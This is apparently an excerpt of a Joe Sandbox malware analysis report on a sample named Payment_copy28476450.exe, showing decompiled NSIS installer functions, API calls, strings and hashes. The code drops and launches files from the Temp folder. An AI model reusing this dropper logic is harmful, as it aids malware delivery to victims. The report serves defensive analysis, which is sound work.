					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004059B3(0x409c50);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004059D2(0x409c50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404FE7(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x424008;
						goto L32;
					} else {
						E00405CFB(0x40a450, 0x425000);
						E00405CFB(0x425000, 0x409c50);
						E00405D1D(_t75, 0x40a450, 0x409c50, 0x40a050,  *((intOrPtr*)(_t85 - 0x14)));
						E00405CFB(0x425000, 0x40a450);
						_t62 = E004055BC(0x40a050,  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x424008 =  &( *0x424008->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c50);
								_push(0xfffffffa);
								E00404FE7();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404FE7(0xffffffea,  *(_t85 - 0xc));
				 *0x424034 =  *0x424034 + 1;
				_t43 = E00402F2E(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x424034 =  *0x424034 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffee);
					} else {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffe9);
						lstrcatA(0x409c50,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c50);
					E004055BC();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x00402672
0x00402672
0x004028a1
0x004028a4
0x004028a4
0x00000000
0x004017e8
0x004017ee
0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x004028aa
0x004028aa
0x004028aa
0x00401833
0x00401833
0x00401834
0x00401492
0x00402224
0x00402224
0x00402224
0x00401831
0x0040182a
0x004028ac
0x004028b0
0x004028b0
0x0040185e
0x00401863
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x0040221f
0x00000000
0x0040221f
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d,"C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d,00000000,00000000,"C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08

Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3

Strings

"C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d, xrefs: 00401750, 00401759, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp, xrefs: 00401761

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d$C:\Users\user\AppData\Local\Temp
API String ID: 1941528284-354528646
Opcode ID: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
Instruction ID: 259d77b7a90db29c7fa011e8bbfdec82aa2f97c3204575e8132969168071ea88
Opcode Fuzzy Hash: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
Instruction Fuzzy Hash: E041C332904519BADF107BA5CD45EAF3669EF41328B20823BF522F11E1D73C4A419F6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402F2E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F2E(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423fd8;
					 *0x417124 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403059(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417124 =  *0x417124 + _t57;
						_t32 = E00403059(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417124 =  *0x417124 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413120, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413120, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417124 =  *0x417124 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

0x00402f33
0x00402f3d
0x00402f46
0x00402f4a
0x00402f55
0x00402f55
0x00402f5d
0x00402f5f
0x00402f66
0x00402f82
0x00402f86
0x0040304f
0x0040304f
0x00000000
0x00402f95
0x00402f98
0x00402f9e
0x00402fa5
0x00402fa8
0x00402fb1
0x0040301e
0x00403024
0x00403026
0x00403026
0x00403038
0x0040303c
0x00000000
0x0040303e
0x0040303e
0x00403041
0x00403047
0x00000000
0x00403047
0x00402fb3
0x00402fb6
0x0040304a
0x0040304a
0x00402fbc
0x00402fc1
0x00402fc1
0x00402fc9
0x00402fcb
0x00402fcb
0x00402fdc
0x00402fe0
0x00000000
0x00000000
0x00402ff4
0x00402ffc
0x0040301a
0x00403051
0x00403051
0x00403003
0x00403003
0x00403006
0x00403009
0x0040300c
0x00403016
0x00000000
0x00403018
0x00000000
0x00403018
0x00403016
0x00000000
0x00402ffc
0x00000000
0x00402fc1
0x00402fb6
0x00402fb1
0x00402fa8
0x00402f86
0x00403052
0x00403056

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402F55
ReadFile.KERNELBASE(?,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?), ref: 00402F82
ReadFile.KERNELBASE(00413120,00004000,?,00000000,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FDC
WriteFile.KERNELBASE(00000000,00413120,?,000000FF,00000000,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FF4

Strings

1A, xrefs: 00402FBC

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: File$Read$PointerWrite
String ID: 1A
API String ID: 2113905535-9103686
Opcode ID: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
Instruction ID: 82d5fff184c734a1787b3ae727349c02325da9e894cdbedb842e9025a389ee8f
Opcode Fuzzy Hash: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
Instruction Fuzzy Hash: 9A313871501209FBCF21DF55DD44AAF3BB8EB44765F20403AF904A6291D3389F91DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403059 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00403059(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417124; // 0x702ba
				_t37 = _t35 -  *0x40b090 + _a4;
				 *0x423f8c = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BE9(1);
					return 0;
				}
				E00403207( *0x41f134);
				SetFilePointer( *0x409018,  *0x40b090, 0, 0); // executed
				 *0x41f130 = _t37;
				 *0x417120 = 0;
				while(1) {
					_t12 =  *0x417128; // 0x3c767
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f134;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031D5(0x413120, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f134 =  *0x41f134 + _t34;
					 *0x40b0b0 = 0x413120;
					 *0x40b0b4 = _t34;
					L6:
					L6:
					if( *0x423f90 != 0 &&  *0x424020 == 0) {
						 *0x417120 =  *0x41f130 -  *0x417124 - _a4 +  *0x40b090;
						E00402BE9(0);
					}
					 *0x40b0b8 = 0x40b120;
					 *0x40b0bc = 0x8000; // executed
					_t16 = E00406184(0x40b098); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40b0b8; // 0x40c2cc
					_t40 = _t39 - 0x40b120;
					if(_t40 == 0) {
						__eflags =  *0x40b0b4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417124; // 0x702ba
						if(_t18 -  *0x40b090 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b120, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40b090 =  *0x40b090 + _t40;
						_t53 =  *0x40b0b4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

0x0040305d
0x0040306a
0x0040307d
0x00403082
0x004031c3
0x004031c5
0x00000000
0x004031cb
0x0040308e
0x004030a1
0x004030a7
0x004030ad
0x004030b8
0x004030b8
0x004030bd
0x004030c2
0x004030ca
0x004030cc
0x004030cc
0x004030d5
0x004030dc
0x00000000
0x00000000
0x004030e2
0x004030e8
0x004030ee
0x00000000
0x004030f4
0x004030fa
0x0040311a
0x0040311f
0x00403124
0x0040312a
0x00403130
0x0040313a
0x00403141
0x00000000
0x00000000
0x00403143
0x00403149
0x0040314b
0x0040317f
0x00403185
0x00000000
0x00000000
0x00403187
0x00403189
0x00000000
0x00000000
0x0040318b
0x0040318b
0x0040319e
0x00000000
0x00000000
0x004031ad
0x00000000
0x004031ad
0x0040315b
0x00403163
0x004031ba
0x004031c0
0x004031c0
0x00000000
0x0040316b
0x0040316b
0x00403171
0x00403177
0x00000000
0x00000000
0x00000000
0x0040317d
0x004031be
0x004031be
0x00000000
0x004031be
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040306E

Part of subcall function 00403207: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000), ref: 004030A1
WriteFile.KERNELBASE(WCMD_ReadAndParseLine,0040C2CC,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 0040315B
SetFilePointer.KERNELBASE(000702BA,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 004031AD

Strings

WCMD_ReadAndParseLine, xrefs: 004030B3, 00403154
1A, xrefs: 004030CE

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: 1A$WCMD_ReadAndParseLine
API String ID: 2146148272-294403876
Opcode ID: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
Instruction ID: 4dd4975a9f59093c3e0d8581b597c69eeb1c8b76cfa1fe2ad7fe21498de3e5f3
Opcode Fuzzy Hash: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
Instruction Fuzzy Hash: 16418D72518201AFC7109F29EE849673BBDF708356714423BEA60B62E0D7386D098B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A0C(0xfffffff0);
				_t10 = E00405882(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405819(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x24)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405CFB("C:\\Users\\engineer\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x0040217a
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x004028a4
0x004028b0

APIs

Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,746AF560,00405634,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 00405890
Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-1104044542
Opcode ID: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
Instruction ID: d0a9f9296d723caddbd0f60560613e174b6a475f07d6f089b0aabedb845a292b
Opcode Fuzzy Hash: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
Instruction Fuzzy Hash: CE010832908140AFD7217B755D4497F37B4DE91369724463FF891B22E1C63C0D42962E

Uniqueness

Uniqueness Score: -1.00%

Function 0040601D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040601D(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryA( &_v292); // executed
				return _t14;
			}

0x00406034
0x0040603d
0x0040603f
0x0040603f
0x00406043
0x00406055
0x0040604f
0x0040604f
0x0040604f
0x00406059
0x0040606d
0x0040607d
0x00406084

APIs

GetSystemDirectoryA.KERNEL32 ref: 00406034
wsprintfA.USER32 ref: 0040606D
LoadLibraryA.KERNELBASE(?), ref: 0040607D

Strings

\, xrefs: 00406045
%s%s.dll, xrefs: 00406067

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$\
API String ID: 2200240437-500877883
Opcode ID: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
Instruction ID: 31df564d024cf24b7dbdd433d12669610400c14d1f093727c30223d65afe2acb
Opcode Fuzzy Hash: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
Instruction Fuzzy Hash: CBF02B309441095BDF14E764DC0DEFB375CEB08344F0445BBA54BE10D2FA78E8698B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405A01 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A01(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x00405a05
0x00405a0b
0x00405a0c
0x00405a0c
0x00405a0d
0x00405a14
0x00405a1e
0x00405a2b
0x00405a2e
0x00405a36
0x00000000
0x00000000
0x00405a3a
0x00000000
0x00000000
0x00405a3c
0x00000000
0x00405a3c
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405A14
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405A2E

Strings

nsa, xrefs: 00405A0D
C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04, 00405A08
"C:\Users\user\Desktop\Payment_copy28476450.exe", xrefs: 00405A01

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Payment_copy28476450.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2626718541
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 5b0006bac455ae629d1f86c67115003f625ce1c04593d449782858effb37a924
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: 81F020327082087BEB104E49EC44B9B7FADDFC5720F10C12BFA049A1C0C2B0A9488BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406184 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406184(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
